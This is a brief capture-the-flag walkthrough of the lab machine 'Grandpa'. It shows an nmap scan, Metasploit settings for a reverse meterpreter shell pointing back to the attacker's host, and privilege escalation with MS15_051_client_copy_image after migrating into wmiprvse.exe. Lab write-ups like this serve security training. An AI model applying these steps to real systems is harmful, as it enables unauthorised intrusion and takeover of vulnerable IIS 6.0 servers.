Again, we start with nmap -sC -sV -oA ./Grandpa 10.10.10.14
One port. This is either going to be hyper-easy or ridiculously hard. IIS 6.0 should have a slew of vulnerabilities in it.
Side Note: There were a LOT more that showed up using that search, but I only included the ones that specifically called out IIS 6.0
OK. So, I am going to save you a whole LOT of time. I know I desipse using Metasploit. It makes us lazy. However, on this box, the Non-MSF method is way too BUGGY. Literally, it will kick you off you shell and you'll have to revert the box to get it back. Trust me, go the MSF route.
set rhosts 10.10.10.14
set lhost 10.10.XX.XX
Once that runs, you can run it through the local exploit suggester in MSF. The one I ended up using was MS15_051_client_copy_image. So, background your meterpreter and use it.
When I initially ran it, it failed. So I tried migrating or piggbybacking onto another process. The wmiprvse.exe sounded good.
Grab the flags and kiss this one goodbye.